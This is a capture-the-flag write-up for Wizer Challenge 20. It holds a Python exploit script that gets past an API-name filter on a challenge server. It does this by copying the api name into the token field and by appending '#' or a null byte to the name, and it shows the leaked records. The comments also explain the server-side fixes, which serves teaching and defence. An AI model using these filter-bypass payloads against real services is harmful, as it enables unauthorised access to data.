Wizer - Challenge 20 - filter bypass

Exploit

import requests

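url = "https://chal20-u8lg-jj.vercel.app/callApi"

# requests.post() has no default timeout, so a stalled server would hang the
# script forever; 10 s is generous for a single small JSON call.
TIMEOUT = 10


def call_api(payload: dict[str, str]) -> "requests.Response":
    """POST *payload* as JSON to ``url`` and echo the reply.

    Prints the HTTP status code and the raw body, then returns the response.
    Non-2xx replies are printed rather than raised: a 400 is itself a useful
    observation for this challenge (see the note on the second call below).
    """
    r = requests.post(url, json=payload, timeout=TIMEOUT)
    print(f"HTTP {r.status_code}")
    print(r.text)
    return r


# Observation: the call goes through when "token" carries the same string as
# "api". That suggests the server compares the two fields against each other
# rather than checking the name against a fixed allow-list -- an inference from
# the response, not something visible here. The server-side fix is an exact
# allow-list lookup of the api name, independent of whatever the client sends
# as token.
r = call_api({
    "api": "CRMEntities",
    "token": "CRMEntities",
})

# Response:

# [
#   {
#     "id": "000001",
#     "name": "Customer",
#     "description": "Describes a customer entity in the system"
#   },
#   {
#     "id": "000002",
#     "name": "Lead",
#     "description": "Describes a lead entity in the system"
#   },
#   {
#     "id": "000003",
#     "name": "Contact",
#     "description": "Describes a contact entity in the system"
#   },
#   {
#     "id": "000004",
#     "name": "Opportunity",
#     "description": "Describes an opportunity entity in the system"
#   },
#   {
#     "id": "000005",
#     "name": "Contract",
#     "description": "Describes a contract entity in the system"
#   },
#   {
#     "id": "000006",
#     "name": "Deal",
#     "description": "Describes a deal entity in the system"
#   },
#   {
#     "id": "000007",
#     "name": "Offer",
#     "description": "Describes an offer entity in the system"
#   }
# ]


# A trailing "#" on the api name is also accepted ("getUser\0" got past the
# filter too, but the Wizer platform answered 400 for that one). Presumably the
# filter matches the name before the server canonicalises it; normalising
# first and then matching exactly would close both variants -- TODO confirm
# against the server code.
r = call_api({
    "api": "getUser#",
    "userId": "670b0741-9fb1-4ef7-afe9-842120a12fcb",
})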